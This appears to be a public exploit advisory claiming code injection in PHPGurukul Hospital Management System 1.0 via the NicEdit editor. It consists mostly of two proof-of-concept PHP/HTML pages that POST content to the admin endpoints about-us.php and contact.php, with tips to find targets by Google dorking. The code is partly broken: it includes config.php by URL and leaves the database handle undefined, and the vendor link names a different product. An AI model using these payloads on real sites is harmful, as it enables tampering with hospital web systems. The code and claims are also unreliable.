Hospital Management System 1.0 Code Injection

=============================================================================================================================================
| # Title : Hospital Management System 1.0(WYSIWYG) code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |
| # Vendor : https://phpgurukul.com/wp-content/uploads/2017/12/Hostel-Management-Syste-Updated-Code.zip |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Part 01 : about-us.php

[+] This payload injects code of your choice into the database via NicEdit is a WYSIWYG editor V: 0.9 r25 which is called inside the file /hms/admin/about-us.php .

[+] Line 2 : Make sure to include your database connection here

[+] Line 44 : Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload :

<?php
include(‘http://127.0.0.1/hospital/hms/admin/include/config.php’); // Make sure to include your database connection here

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’ WHERE PageType=’aboutus'”);

if ($query) {
echo ‘<script>alert(“About Us has been updated.”)</script>’;
} else {
echo ‘<script>alert(“Something Went Wrong. Please try again.”)</script>’;
}
exit;
}
?>

<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>indoushka | Update About Us Content</title>
<!– NicEdit Script –>
<script src=”http://js.nicedit.com/nicEdit-latest.js” type=”text/javascript”></script>
<script type=”text/javascript”>
// Apply NicEdit to all text areas when the DOM is loaded
bkLib.onDomLoaded(nicEditors.allTextAreas);

// Function to handle form submission using JavaScript
function submitForm(event) {
event.preventDefault(); // Prevent default form submission

const pagetitle = document.getElementById(‘pagetitle’).value;
const pagedes = nicEditors.findEditor(‘pagedes’).getContent(); // Get the NicEdit content

// Prepare the form data to be sent
const formData = new FormData();
formData.append(‘pagetitle’, pagetitle);
formData.append(‘pagedes’, pagedes);
formData.append(‘submit’, true);

// Send the form data using fetch API
fetch(‘http://127.0.0.1/hospital/hms/admin/about-us.php’, {
method: ‘POST’,
body: formData,
})
.then(response => response.text())
.then(data => {
alert(‘About Us content has been updated successfully.’);
console.log(data); // Handle the response from the server
})
.catch(error => {
console.error(‘Error:’, error);
});
}
</script>
<style>
/* Center the form container */
.editor-container {
max-width: 800px;
margin: 0 auto; /* Center horizontally */
padding: 20px;
text-align: center; /* Center the content inside */
}

/* Ensure the textarea takes the full width */
#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id=”app”>
<div class=”app-content”>
<div class=”main-content”>
<div class=”wrap-content container” id=”container”>
<!– Page Title Section –>
<section id=”page-title”>
<div class=”row”>
<div class=”col-sm-8″>
<h1 class=”mainTitle”>Update the About Us Content</h1>
</div>

</li>
</ol>
</div>
</section>
<!– Form Section –>
<div class=”container-fluid container-fullw bg-white”>
<div class=”row”>
<div class=”col-md-12″>
<!– Centering the form using a wrapper div –>
<div class=”editor-container”>
<form class=”forms-sample” method=”post” onsubmit=”submitForm(event);”>
<div class=”form-group”>
<label for=”pagetitle”>Page Title</label>
<input id=”pagetitle” name=”pagetitle” type=”text” class=”form-control” required>
</div>
<div class=”form-group”>
<label for=”pagedes”>Page Description</label>
<!– NicEdit will enhance this textarea –>
<textarea class=”form-control” name=”pagedes” id=”pagedes” rows=”12″></textarea>
</div>
<button type=”submit” class=”btn btn-primary mr-2″ name=”submit”>Submit</button>
</form>
</div>
</div>
</div>
</div>
<!– End Form Section –>
</div>
</div>
</div>
</div>
<!– Footer –>
</body>
</html>

———————- [+] Part 02 : contact.php [+] ——————–

[+] Line 4 : Make sure to include your database connection here

[+] Line 60 : Send the form data using fetch API (Set your target url)

[+] save payload as poc.php in your localhost path .

[+] payload :

<?php

// عنوان الخادم الخارجي
$url = ‘http://127.0.0.1/hospital/hms/admin/include/config.php’;

// جلب البيانات من الخادم الخارجي
$response = file_get_contents($url);

// التحقق من وجود البيانات
if ($response !== FALSE) {
// التعامل مع البيانات
echo $response;
} else {
echo ‘حدث خطأ أثناء جلب البيانات.’;
}

if (isset($_POST[‘submit’])) {
$pagetitle = $_POST[‘pagetitle’];
$pagedes = $con->real_escape_string($_POST[‘pagedes’]);
$email = $con->real_escape_string($_POST[’email’]);
$mobnum = $con->real_escape_string($_POST[‘mobnum’]);

$query = mysqli_query($con, “UPDATE tblpage SET PageTitle=’$pagetitle’, PageDescription=’$pagedes’, Email=’$email’, MobileNumber=’$mobnum’ WHERE PageType=’contactus'”);

if ($query) {
echo ‘<script>alert(“Contact Us has been updated.”)</script>’;
} else {
echo ‘<script>alert(“Something Went Wrong. Please try again.”)</script>’;
}
exit;
}

?>
<!DOCTYPE html>
<html lang=”en”>
<head>
<meta charset=”UTF-8″>
<meta name=”viewport” content=”width=device-width, initial-scale=1.0″>
<title>Admin | Update Contact Us Content</title>
<!– NicEdit Script –>
<script src=”http://js.nicedit.com/nicEdit-latest.js” type=”text/javascript”></script>
<script type=”text/javascript”>
bkLib.onDomLoaded(nicEditors.allTextAreas);

function submitForm(event) {
event.preventDefault();

const pagetitle = document.getElementById(‘pagetitle’).value;
const pagedes = nicEditors.findEditor(‘pagedes’).getContent();
const email = document.getElementById(’email’).value;
const mobnum = document.getElementById(‘mobnum’).value;

const formData = new FormData();
formData.append(‘pagetitle’, pagetitle);
formData.append(‘pagedes’, pagedes);
formData.append(’email’, email);
formData.append(‘mobnum’, mobnum);
formData.append(‘submit’, true);

fetch(‘http://127.0.0.1/hospital/hms/admin/contact.php’, {
method: ‘POST’,
body: formData,
})
.then(response => response.text())
.then(data => {
alert(‘Contact Us content has been updated successfully.’);
console.log(data);
})
.catch(error => {
console.error(‘Error:’, error);
});
}
</script>
<style>
.editor-container {
max-width: 800px;
margin: 0 auto;
padding: 20px;
text-align: center;
}

#pagedes {
width: 100%;
height: 300px;
margin: 0 auto;
}
</style>
</head>
<body>
<div id=”app”>
<div class=”app-content”>
<div class=”main-content”>
<div class=”wrap-content container” id=”container”>
<section id=”page-title”>
<div class=”row”>
<div class=”col-sm-8″>
<h1 class=”mainTitle”>Admin | Update Contact Us Content</h1>
</div>
<ol class=”breadcrumb”>
<li class=”active”>
<span>Update Contact Us Content</span>
</li>
</ol>
</div>
</section>
<div class=”container-fluid container-fullw bg-white”>
<div class=”row”>
<div class=”col-md-12″>
<div class=”editor-container”>
<form class=”forms-sample” method=”post” onsubmit=”submitForm(event);”>
<div class=”form-group”>
<label for=”pagetitle”>Page Title</label>
<input id=”pagetitle” name=”pagetitle” type=”text” class=”form-control” required>
</div>
<div class=”form-group”>
<label for=”pagedes”>Page Description</label>
<textarea class=”form-control” name=”pagedes” id=”pagedes” rows=”12″></textarea>
</div>
<div class=”form-group”>
<label for=”email”>Email</label>
<input id=”email” name=”email” type=”email” class=”form-control” required>
</div>
<div class=”form-group”>
<label for=”mobnum”>Mobile Number</label>
<input id=”mobnum” name=”mobnum” type=”text” class=”form-control” required>
</div>
<button type=”submit” class=”btn btn-primary mr-2″ name=”submit”>Submit</button>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>

Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================